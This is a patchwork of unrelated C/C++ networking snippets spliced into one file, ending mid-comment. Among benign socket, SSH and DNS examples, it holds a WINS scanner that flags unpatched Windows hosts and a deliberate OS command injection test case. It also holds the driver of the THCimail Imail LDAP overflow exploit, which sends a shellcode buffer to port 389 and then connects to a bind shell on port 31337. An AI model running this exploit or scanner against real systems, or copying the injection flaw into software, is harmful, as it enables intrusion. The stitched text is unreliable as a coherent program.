int main() {
/*int c = 0;
std::thread t(shit, 2, 3, std::ref(c));
std::cout << c << std::endl;
sc::Library lib("core.dll");
modfunc f = (modfunc)lib.GetSymbol("initMod");
f();*/
//std::string hash = sha1::hash("x3JJHMbDL1EzLkh9GBhXDw==258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
//std::string str = sc::str::tolower("x3JJHMbDL1 € EzLkh9GBh¢XDw==");
//auto ef = sc::str::split("fu\nck", '\n');
//std::cout << calculateConnectionHash(str);
//std::cout << base64_decode("HSmrc0sMlYUkAGmm5OPpG2HaGWk=");
#ifdef _WIN32
SetConsoleCtrlHandler((PHANDLER_ROUTINE)&ctrlHandler, TRUE);
WSADATA wdata;
if(WSAStartup(MAKEWORD(2, 2), &wdata) != 0)
return false;
#else
signal(SIGINT, sigHandler);
signal(SIGTERM, sigHandler);
signal(SIGABRT, sigHandler);
#endif
auto req = sc::HTTPRequest::Get("http://chat.flashii.net/", {
{"view", "auth"},
{"arg1", "303"},
{"arg2", "2ef2094972cc00f0860cd85e96a243eaac67497d"}
});
std::cout << req.content;
//auto req = sc::HTTPRequest::Get("http://aroltd.com/");
//std::string wowo = sc::net::packTime();
sc::INI test;
try {
test = sc::INI("c_config.ini", {
{"socket", {
{"client_root", sc::INI::STRING},
{"port", sc::INI::INTEGER}
}},
{"structure", {
{"backlog_length", sc::INI::INTEGER},
{"default_channel", sc::INI::STRING}
}},
{"limits", {
{"max_conns_per_ip", sc::INI::INTEGER},
{"max_channel_depth", sc::INI::INTEGER},
{"max_channel_name_length", sc::INI::INTEGER},
{"max_username_length", sc::INI::INTEGER},
{"max_message_length", sc::INI::INTEGER},
{"max_idle_time", sc::INI::INTEGER}
}}
});
} catch(std::exception &e) {
std::cout << e.what() << std::endl;
return -1;
}
std::string a = test["socket"]["port"];
sc::Socket client;
if(!sock.Init(6770)) {
std::cout << "Could not open socket on port 6770! Error: " << std::endl;
return -1;
}
sock.SetBlocking(false);
int status;
auto conns = std::map<std::string, ThreadContext*>();
while(true) {
if((status = sock.Accept(client)) == 0) {
if(conns.count(client.GetIPAddress()) == 0) {
auto tmp = new ThreadContext(new sc::Socket(client));
conns[client.GetIPAddress()] = tmp;
std::thread(connectionThread, tmp).detach();
} else
conns[client.GetIPAddress()]->PushSocket(new sc::Socket(client));
} else if(status == -1) break;
for(auto i = conns.begin(); i != conns.end(); ) {
if(i->second->IsDone()) {
delete i->second;
i = conns.erase(i);
} else ++i;
}
}
sock.Close();
#ifdef _WIN32
WSACleanup();
#endif
return 0;
}
void CWE78_OS_Command_Injection__char_listen_socket_execlp_65_bad()
{
char * data;
/* define a function pointer */
void (*funcPtr) (char *) = CWE78_OS_Command_Injection__char_listen_socket_execlp_65b_badSink;
char dataBuffer[100] = "";
data = dataBuffer;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
char *replace;
SOCKET listenSocket = INVALID_SOCKET;
SOCKET acceptSocket = INVALID_SOCKET;
size_t dataLen = strlen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a listen socket */
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listenSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(TCP_PORT);
if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR)
{
break;
}
acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed */
recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(char)] = '\0';
/* Eliminate CRLF */
replace = strchr(data, '\r');
if (replace)
{
*replace = '\0';
}
replace = strchr(data, '\n');
if (replace)
{
*replace = '\0';
}
}
while (0);
if (listenSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(listenSocket);
}
if (acceptSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(acceptSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
/* use the function pointer */
funcPtr(data);
}
UINT engine2(LPVOID tip)
{
int ip=int(tip);
#ifdef WIN32
WSADATA wsadata;
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");mthread--;return -1;}
#endif
SOCKET s;fd_set mask;struct timeval timeout, timeout2; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){se++;mthread--;
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(42);
if (scanend<=scan+1){printf("[+] status..: %d%s thread(s):%d \r",(scanend)*100/(scan),pcent,mthread);}
unsigned long flag=1;
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{
se++;mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;timeout2.tv_sec=5;timeout2.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
case 0: {mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
default:
if(FD_ISSET(s,&mask))
{
ok2++;
if (send(s,data,sizeof(data)-1,0)==-1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: error sending, not wins\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: error sending, not wins \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));}
mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
sl(3);
switch(select(s+1,&mask,NULL,NULL,&timeout2))
{
case -1: {mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
case 0: {fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: nothing received, not wins or vulnerable service freezing\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: nothing received, not wins or vulnerable service freezing\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));}
mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
default:
rc = recv(s,recvbuf,sizeof(recvbuf),0);
}
if (rc<40||recvbuf[3]!=41&&recvbuf[8]!=88){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: not wins, wrong datas\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: not wins, wrong datas \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));}
mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
ok3++;
if (recvbuf[24]==-144&&recvbuf[25]==-107){spb=0;}
else if (recvbuf[24]==40&&recvbuf[25]==-5){spb=1;}
if (recvbuf[36]==37&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: NOT_PATCHED\nOS.............: Windows 2003 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: NOT_PATCHED \nOS.............: Windows 2003 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);}
ok++;k3++;tot++;if (bose==1){scr1(server);}mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
else if (recvbuf[36]==53&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2003 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);fflush(fplog);
if (recvbuf[24]==-144&&recvbuf[25]==-107){spb=0;}
else if (recvbuf[24]==40&&recvbuf[25]==-5){spb=1;}
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2003 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);}
k3++;mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
else if (recvbuf[36]==71&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2003 SP1\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2003 SP1 \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));}
k3++;mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
else if (recvbuf[36]==85&&recvbuf[37]==31&&recvbuf[40]==24&&recvbuf[41]==37||
recvbuf[36]==-111&&recvbuf[37]==-127&&recvbuf[40]==64&&recvbuf[41]==-106||
recvbuf[36]==-107&&recvbuf[37]==43&&recvbuf[40]==8&&recvbuf[41]==54||
recvbuf[36]==-89&&recvbuf[37]==-99&&recvbuf[40]==-128&&recvbuf[41]==38||
recvbuf[36]==69&&recvbuf[37]==-112&&recvbuf[40]==-144&&recvbuf[41]==31||
recvbuf[36]==-37&&recvbuf[37]==-128&&recvbuf[40]==-136&&recvbuf[41]==-82){
if (recvbuf[36]==85&&recvbuf[37]==31&&recvbuf[40]==24&&recvbuf[41]==37||recvbuf[36]==-111&&recvbuf[37]==-127&&recvbuf[40]==64&&recvbuf[41]==-106){sp=4;}
else if (recvbuf[36]==-107&&recvbuf[37]==43&&recvbuf[40]==8&&recvbuf[41]==54){sp=3;}
else if (recvbuf[36]==-89&&recvbuf[37]==-99&&recvbuf[40]==-128&&recvbuf[41]==38){sp=2;}
else if (recvbuf[36]==69&&recvbuf[37]==-112&&recvbuf[40]==-144&&recvbuf[41]==31){sp=1;}
else if (recvbuf[36]==-37&&recvbuf[37]==-128&&recvbuf[40]==-136&&recvbuf[41]==-82){sp=0;}
if (recvbuf[16]==0&&recvbuf[17]==0&&recvbuf[18]==0){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2000 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2000 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);}
k0++;mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
else {fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: NOT_PATCHED\nOS.............: Windows 2000 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: NOT_PATCHED \nOS.............: Windows 2000 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);}
ok++;k0++;tot++;if (bose==1){scr2(server);}mthread--;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
}
else {
fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: unknown\nOS.............: NT4 (OS not implemented)\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog);
if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: unknown \nOS.............: NT4 (OS not implemented) \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));}
t4++;mthread--;tot++;closesocket(s);
#ifdef WIN32
return -1;
#else
return engine;
#endif
}
}
}
mthread--;
closesocket(s);
#ifdef WIN32
return 0;
#else
return engine;
#endif
}
SocketInitializer()
{
WSADATA init;
WSAStartup(MAKEWORD(2, 2), &init);
}
void CSynForcePadDlg::EviaDadosViaSocket(ULONG ul, LONG lX, LONG lY, LONG lZ, long lForce, int evento)
{
// evento = 1 -> TOUCH_DOWN
// evento = 2 -> TOUCH_MOVE
// evento = 3 -> TOUCH_UP
// Aqui coloco as definições do SOCKET
int wsaret=WSAStartup(0x101,&wsaData);
if(wsaret)
return;
conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(conn==INVALID_SOCKET)
return;
int porta = 123;
sprintf(ServerNameInChar,"127.0.0.1");
if(inet_addr((char*) ServerNameInChar)==INADDR_NONE)
{
hp=gethostbyname(ServerNameInChar);
}
else
{
addr=inet_addr(ServerNameInChar);
hp=gethostbyaddr((char*)&addr,sizeof(addr),AF_INET);
}
if(hp==NULL)
{
closesocket(conn);
return;
}
server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
server.sin_family=AF_INET;
server.sin_port=htons(porta);
if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
{
closesocket(conn);
return;
}
// Fim da inicialização do socket
// SEQUENCIA DE DADOS: Finger %d, XRaw %d, YRaw %d, ZRaw %d, Force %d, evento
// sprintf(buff,"Ola DADOS: Finger %d, XRaw %d, YRaw %d, ZRaw %d, Force %d",ul, lX, lY, lZ, lForce);
// sprintf(buff,"Ola DADOS: Finger %d, X %d, Y %d, Z %d, F %d, E %d",ul, lX, lY, lZ, lForce, evento);
sprintf(buff,"Ola %d,%d,%d,%d,%d,%d",ul, lX, lY, lZ, lForce, evento);
send(conn,buff,strlen(buff),0);
// Finalizações do socket
closesocket(conn);
WSACleanup();
}
int main(int argc, char **argv)
{
WSADATA wsa_data;
SOCKET listening_socket = INVALID_SOCKET,
client_socket = INVALID_SOCKET;
struct addrinfo *result = NULL,
hints;
struct sockaddr address;
int return_code,
index,
address_length,
shutdown_signal = 0;
char control_message[MAX_INPUT_LENGTH];
HTHREAD threads[MAX_CONNECTIONS];
init_crc();
printf("UFTP Daemon v0.8\n");
printf("--------------------------\n\n");
printf("On fixed port: %s\n", CONNECT_PORT);
printf("Max. Connurent Connections: %d\n", MAX_CONNECTIONS);
printf("\nServer staring up.");
// Clean up thread lookup
memset(threads, 0, sizeof(HTHREAD) * MAX_CONNECTIONS);
printf(".");
// Initialize Winsock sub-system
return_code = WSAStartup(MAKEWORD(2,2), &wsa_data);
if(return_code != 0)
{
printf("WSAStartup failed: %d\n", return_code);
return 1;
}
printf(".");
// Resolve the server address and port
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
hints.ai_flags = AI_PASSIVE;
return_code = getaddrinfo(NULL, CONNECT_PORT, &hints, &result);
if(return_code != 0)
{
printf("getaddrinfo failed: %d\n", return_code);
WSACleanup();
return 1;
}
printf(".");
// Create a SOCKET for connecting to server
listening_socket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
if(listening_socket == INVALID_SOCKET)
{
printf("socket failed: %ld\n", WSAGetLastError());
freeaddrinfo(result);
WSACleanup();
return 1;
}
printf(".");
// Setup the TCP listening socket
return_code = bind(listening_socket, result->ai_addr, (int)result->ai_addrlen);
if(return_code == SOCKET_ERROR)
{
printf("bind failed: %d\n", WSAGetLastError());
freeaddrinfo(result);
closesocket(listening_socket);
WSACleanup();
return 1;
}
freeaddrinfo(result);
printf(".");
return_code = listen(listening_socket, SOMAXCONN);
if(return_code == SOCKET_ERROR)
{
printf("listen failed: %d\n", WSAGetLastError());
closesocket(listening_socket);
WSACleanup();
return 1;
}
printf(".DONE!\n\n");
// Loop until shutdown
while(!shutdown_signal)
{
// Accept a client socket
memset(&address, 0, sizeof(address));
client_socket = INVALID_SOCKET;
address_length = sizeof(address);
client_socket = accept(listening_socket, &address, &address_length);
if(client_socket == INVALID_SOCKET)
printf("accept failed: %d\n", WSAGetLastError());
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
return_code = recv(client_socket, control_message, MAX_INPUT_LENGTH-1, 0);
if(control_message[0] != CONTROL_MESSAGE_SEND_HELLO)
{
return_code = shutdown(client_socket, SD_BOTH);
closesocket(client_socket);
continue;
}
// Client socket valid start tread to handle client
index = find_next_free_thread(threads);
if(index == -1)
{
printf("max connections reached: %d\n", MAX_CONNECTIONS);
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
control_message[0] = CONTROL_MESSAGE_SERVER_BUSY;
return_code = send(client_socket, control_message, (int)strlen(control_message), 0);
return_code = shutdown(client_socket, SD_BOTH);
closesocket(client_socket);
continue;
}
threads[index].in_use = 1;
threads[index].socket = client_socket;
memcpy(&threads[index].address, &address, sizeof(address));
threads[index].handle = CreateThread(NULL, 0, handle_client_thread, &threads[index], 0, &threads[index].id);
if(threads[index].handle == NULL)
printf("unable to create thread: %d\n", index);
// TODO: Add clean way to close down server
//if(tolower(getchar()) == (int)'q')
// shutdown_signal = 1;
}
// Close to stop new connections
closesocket(listening_socket);
// Make sure all threads are complete and exited
for(index = 0; index < MAX_CONNECTIONS; index++)
{
WaitForSingleObject(threads[index].handle, INFINITE);
CloseHandle(threads[index].handle);
}
// Close down socket sub-system
WSACleanup();
return 0;
}
int main(int argc, char *argv[])
{
const char *hostname = "127.0.0.1";
const char *commandline = "uptime";
const char *username = "******";
const char *password = "******";
unsigned long hostaddr;
int sock;
struct sockaddr_in sin;
const char *fingerprint;
LIBSSH2_SESSION *session;
LIBSSH2_CHANNEL *channel;
int rc;
int exitcode;
char *exitsignal=(char *)"none";
int bytecount = 0;
size_t len;
LIBSSH2_KNOWNHOSTS *nh;
int type;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if (argc > 1)
/* must be ip address only */
hostname = argv[1];
if (argc > 2) {
username = argv[2];
}
if (argc > 3) {
password = argv[3];
}
if (argc > 4) {
commandline = argv[4];
}
rc = libssh2_init (0);
if (rc != 0) {
fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
return 1;
}
hostaddr = inet_addr(hostname);
/* Ultra basic "connect to port 22 on localhost"
* Your code is responsible for creating the socket establishing the
* connection
*/
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons(22);
sin.sin_addr.s_addr = hostaddr;
if (connect(sock, (struct sockaddr*)(&sin),
sizeof(struct sockaddr_in)) != 0) {
fprintf(stderr, "failed to connect!\n");
return -1;
}
/* Create a session instance */
session = libssh2_session_init();
if (!session)
return -1;
/* tell libssh2 we want it all done non-blocking */
libssh2_session_set_blocking(session, 0);
/* ... start it up. This will trade welcome banners, exchange keys,
* and setup crypto, compression, and MAC layers
*/
while ((rc = libssh2_session_handshake(session, sock)) ==
LIBSSH2_ERROR_EAGAIN);
if (rc) {
fprintf(stderr, "Failure establishing SSH session: %d\n", rc);
return -1;
}
nh = libssh2_knownhost_init(session);
if(!nh) {
/* eeek, do cleanup here */
return 2;
}
/* read all hosts from here */
libssh2_knownhost_readfile(nh, "known_hosts",
LIBSSH2_KNOWNHOST_FILE_OPENSSH);
/* store all known hosts to here */
libssh2_knownhost_writefile(nh, "dumpfile",
LIBSSH2_KNOWNHOST_FILE_OPENSSH);
fingerprint = libssh2_session_hostkey(session, &len, &type);
if(fingerprint) {
struct libssh2_knownhost *host;
#if LIBSSH2_VERSION_NUM >= 0x010206
/* introduced in 1.2.6 */
int check = libssh2_knownhost_checkp(nh, hostname, 22,
fingerprint, len,
LIBSSH2_KNOWNHOST_TYPE_PLAIN|
LIBSSH2_KNOWNHOST_KEYENC_RAW,
&host);
#else
/* 1.2.5 or older */
int check = libssh2_knownhost_check(nh, hostname,
fingerprint, len,
LIBSSH2_KNOWNHOST_TYPE_PLAIN|
LIBSSH2_KNOWNHOST_KEYENC_RAW,
&host);
#endif
fprintf(stderr, "Host check: %d, key: %s\n", check,
(check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH)?
host->key:"<none>");
/*****
* At this point, we could verify that 'check' tells us the key is
* fine or bail out.
*****/
}
else {
/* eeek, do cleanup here */
return 3;
}
libssh2_knownhost_free(nh);
if ( strlen(password) != 0 ) {
/* We could authenticate via password */
while ((rc = libssh2_userauth_password(session, username, password)) ==
LIBSSH2_ERROR_EAGAIN);
if (rc) {
fprintf(stderr, "Authentication by password failed.\n");
goto shutdown;
}
}
else {
/* Or by public key */
while ((rc = libssh2_userauth_publickey_fromfile(session, username,
"/home/user/"
".ssh/id_rsa.pub",
"/home/user/"
".ssh/id_rsa",
password)) ==
LIBSSH2_ERROR_EAGAIN);
if (rc) {
fprintf(stderr, "\tAuthentication by public key failed\n");
goto shutdown;
}
}
#if 0
libssh2_trace(session, ~0 );
#endif
/* Exec non-blocking on the remove host */
while( (channel = libssh2_channel_open_session(session)) == NULL &&
libssh2_session_last_error(session,NULL,NULL,0) ==
LIBSSH2_ERROR_EAGAIN )
{
waitsocket(sock, session);
}
if( channel == NULL )
{
fprintf(stderr,"Error\n");
exit( 1 );
}
while( (rc = libssh2_channel_exec(channel, commandline)) ==
LIBSSH2_ERROR_EAGAIN )
{
waitsocket(sock, session);
}
if( rc != 0 )
{
fprintf(stderr,"Error\n");
exit( 1 );
}
for( ;; )
{
/* loop until we block */
int rc;
do
{
char buffer[0x4000];
rc = libssh2_channel_read( channel, buffer, sizeof(buffer) );
if( rc > 0 )
{
int i;
bytecount += rc;
fprintf(stderr, "We read:\n");
for( i=0; i < rc; ++i )
fputc( buffer[i], stderr);
fprintf(stderr, "\n");
}
else {
if( rc != LIBSSH2_ERROR_EAGAIN )
/* no need to output this for the EAGAIN case */
fprintf(stderr, "libssh2_channel_read returned %d\n", rc);
}
}
while( rc > 0 );
/* this is due to blocking that would occur otherwise so we loop on
this condition */
if( rc == LIBSSH2_ERROR_EAGAIN )
{
waitsocket(sock, session);
}
else
break;
}
exitcode = 127;
while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN )
waitsocket(sock, session);
if( rc == 0 )
{
exitcode = libssh2_channel_get_exit_status( channel );
libssh2_channel_get_exit_signal(channel, &exitsignal,
NULL, NULL, NULL, NULL, NULL);
}
if (exitsignal)
fprintf(stderr, "\nGot signal: %s\n", exitsignal);
else
fprintf(stderr, "\nEXIT: %d bytecount: %d\n", exitcode, bytecount);
libssh2_channel_free(channel);
channel = NULL;
shutdown:
libssh2_session_disconnect(session,
"Normal Shutdown, Thank you for playing");
libssh2_session_free(session);
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
fprintf(stderr, "all done\n");
libssh2_exit();
return 0;
}
int main(int argc, char** argv)
{
WSADATA w;
unsigned short PORT = 53;
int CLIENT_LENGTH;
int BYTES_RECVD;
SOCKET sd;
struct sockaddr_in SERVER, CLIENT;
char BUFFER[4096];
memset((void*)&SERVER, '\0', sizeof(struct sockaddr_in));
SERVER.sin_family = AF_INET;
SERVER.sin_port = htons(PORT);
// Open winsock
if(WSAStartup(0x0101, &w) != 0) {
fprintf(stderr, "Could not get winsock\n");
exit(0);
}
sd = socket(AF_INET, SOCK_DGRAM, 0);
if(sd == INVALID_SOCKET) {
fprintf(stderr, "Could not create socket\n");
WSACleanup();
exit(0);
}
strtosockaddr_in("0.0.0.0", &SERVER);
if(bind(sd, (struct sockaddr*)&SERVER, sizeof(struct sockaddr_in)) == -1) {
fprintf(stderr, "Could not bind to socket\n");
closesocket(sd);
WSACleanup();
exit(0);
}
printf("Server running on %u.%u.%u.%u\n",
(unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b1,
(unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b2,
(unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b3,
(unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b4);
printf("Press CTRL + C to quit\n");
while(1) {
CLIENT_LENGTH = (int)sizeof(struct sockaddr_in);
BYTES_RECVD = recvfrom(sd, BUFFER, 4096, 0, (struct sockaddr*)&CLIENT, &CLIENT_LENGTH);
if(BYTES_RECVD < 0) {
fprintf(stderr, "Could not recieve datagram\n");
closesocket(sd);
WSACleanup();
exit(0);
}
QUESTION* qq = parse_question(BUFFER, BYTES_RECVD);
char *connected_ip = inet_ntoa(CLIENT.sin_addr);
printf("QUERY TYPE:%d from %s:%d is %s\n", qq->TYPE, connected_ip, CLIENT.sin_port, qq->QUERY);
}
closesocket(sd);
WSACleanup();
return 0;
}
void main() {
//初始化SOCKET必须调用
WSAData wsd;
WSAStartup(MAKEWORD(2, 0), &wsd);
printf("为确保程序正常运行,请先启动服务端\n");
printf("请输入你想连接的地址,按回车会默认使用本机地址\n");
char i_address[16];
gets(i_address);
if (i_address[0] == '\0')
{
strcpy(i_address, "127.0.0.1");
}
printf("准备与服务器 %s 建立连接 端口:%d\n", i_address, PORT);
//创建SOCKET
SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET)
{
printf("socket 创建失败,错误代码:%d\n", WSAGetLastError());
exit(0);
}
//定义 socket 地址 初始化清空
struct sockaddr_in channel;
memset(&channel, 0, sizeof(channel));
channel.sin_family = AF_INET;
channel.sin_addr.s_addr = inet_addr(i_address);
channel.sin_port = htons(PORT);
//绑定地址以及端口
int c = connect(s, (struct sockaddr *) &channel, sizeof(channel));
if (c == SOCKET_ERROR)
{
printf("连接出错 失败, 错误代码:%d\n", WSAGetLastError());
exit(0);
}
//初始化工作完成
printf("TCP连接已建立 ,准备向主机 %s:%d 发送信息\n ", i_address, PORT);
//定义缓冲区
char buf[BUF_SIZE];
char info[256];
char quitInfo[] = "QUIT";
int nBytesSend = strlen(buf);
do
{
gets(info);
if (info[0] == '\0')
{
printf("没有检测到内容,请重新输入\n");
}
else {
if (!strcmp(info, quitInfo))
{
printf("检测到退出命令\n");
break;
}
strcpy(buf, info);
nBytesSend = send(s, buf, strlen(buf), 0);
}
} while (nBytesSend == strlen(buf));
printf("即将关闭连接\n");
int r = closesocket(s);
if (r == SOCKET_ERROR)
{
printf("关闭失败\n");
exit(0);
}
printf("输入结束 与服务器连接断开,按任意键结束\n");
getch();
}
int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
unsigned int IMAIL6_7=60;
unsigned int IMAIL_8=68;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
printf("tested on Imail 6-8\n");
printf("by Johnny Cyberpunk ([email protected])\n");
if(argc<4 || argc>4)
usage();
ver = (unsigned short)atoi(argv[3]);
switch(ver)
{
case 0:
IMAILVER = IMAIL6_7;
break;
case 1:
IMAILVER = IMAIL_8;
break;
default:
printf("\nYou entered an illegal version !\n\n");
usage();
exit(-1);
}
crapbuf1 = malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);
printf("imailver = %d\n",IMAILVER);
crapbuf2 = malloc(2220);
memset(crapbuf2,'X',2220);
finalbuffer = malloc(2650);
memset(finalbuffer,0,2650);
printf("\n[*] building buffer\n");
strcat(finalbuffer,ldapshit);
strcat(finalbuffer,crapbuf1);
strcat(finalbuffer,jumper);
os = (unsigned short)atoi(argv[2]);
switch(os)
{
case 0:
strcat(finalbuffer,WIN2KPG);
break;
case 1:
strcat(finalbuffer,WIN2KPG);
break;
case 2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYou entered an illegal OS !\n\n");
usage();
exit(-1);
}
strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(389);
printf("[*] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*] Exploit send successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ldap port!\n");
if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
}
shutdown(sock,1);
closesocket(sock);
free(crapbuf1);
free(crapbuf2);
free(finalbuffer);
exit(0);
}
/**
* Initilises the listening socket
